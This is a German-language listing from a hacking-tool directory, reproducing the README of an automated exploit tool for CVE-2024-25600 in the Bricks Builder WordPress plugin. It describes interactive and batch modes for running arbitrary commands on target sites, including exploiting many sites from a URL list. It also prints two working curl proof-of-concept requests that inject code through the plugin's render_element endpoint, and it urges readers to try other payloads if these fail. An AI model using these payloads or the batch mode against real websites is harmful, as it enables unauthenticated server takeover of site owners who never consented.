Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — Automatisiertes Exploit-Tool für CVE-2024-25600, das nicht authentifizierte Remote-Codeausführung auf WordPress-Websites mit dem Bricks Builder Plugin ermöglicht. Unterstützt interaktive und Batch-Modi zur Befehlsausführung. | Kitploit
Tools/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Automatisiertes Exploit-Tool für CVE-2024-25600, das nicht authentifizierte Remote-Codeausführung auf WordPress-Websites mit dem Bricks Builder Plugin ermöglicht. Unterstützt interaktive und Batch-Modi zur Befehlsausführung.

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft
Teilen

CVE-2024-25600 Exploit-Tool 🚀

Beschreibung 📝

Dieses Tool 🛠️ wurde entwickelt, um die in dem Bricks Builder Plugin für WordPress gefundene Schwachstelle CVE-2024-25600 🕳️ auszunutzen. Die Schwachstelle ermöglicht eine nicht authentifizierte Remote-Codeausführung auf betroffenen Websites 💻. Das Tool automatisiert den Exploit-Prozess, indem es Nonces abruft und speziell gestaltete Anfragen sendet, um beliebige Befehle auszuführen.

Funktionen 🌟

  • Interaktiver Modus: Interagiere in Echtzeit mit der Ziel-Website 🕹️.
  • Batch-Modus: Scanne und exploite mehrere Websites aus einer Liste 📋.
  • Befehlsausführung: Führe beliebige Befehle auf dem Zielserver aus ⚙️.

Installation 🛠️

  1. Klone dieses Repository auf deinen lokalen Rechner 🖥️ mit git clone.
  2. Navigiere in das Verzeichnis des geklonten Repositorys.
  3. Installiere die erforderlichen Python-Bibliotheken mit pip install -r requirements.txt.

Verwendung 📖

Interaktiver Modus 🎮

  1. Führe das Tool mit python exploit.py -u <URL> aus, um den interaktiven Modus zu starten.
  2. Folge den Bildschirmanweisungen, um Befehle an den Zielserver zu senden.

Batch-Modus 📊

  1. Bereite eine Textdatei mit einer Liste von Ziel-URLs vor.
  2. Führe das Tool mit python exploit.py -l <Dateipfad> aus, um die gelisteten Seiten zu scannen und zu exploiten.

Proof of Concept (PoC) 📝

Der grundlegende PoC aus der Offenlegung lautet wie folgt:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Update: Zweiter PoC (zuverlässiger)

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Es ist möglich, dass zusätzliche Payloads bessere Ergebnisse liefern. Falls mein Exploit oder Proof of Concept bei dir nicht funktioniert, ermutige ich dich, mit alternativen Payloads zu experimentieren, um eine effektivere Lösung zu finden.

Ersetze [HOST] durch die Ziel-Website und [NONCE] durch den von der Website abgerufenen Nonce-Wert.

Referenz 📖

Für weitere Informationen über die Schwachstelle CVE-2024-25600 siehe bitte die detaillierte Offenlegung auf Snicco.io.

Haftungsausschluss ⚠️

Die in dieser README bereitgestellten Informationen dienen ausschließlich zu Bildungszwecken. Nicht autorisiertes Hacken von Websites oder Netzwerken ist illegal und unethisch. 🚫

Danksagungen 🙏

Lob an die Sicherheitsforscher, die diese Schwachstelle entdeckt und gemeldet haben, und der Community Informationen und Tools zur Verfügung gestellt haben, um ihre Webanwendungen zu sichern.

Tool herunterladen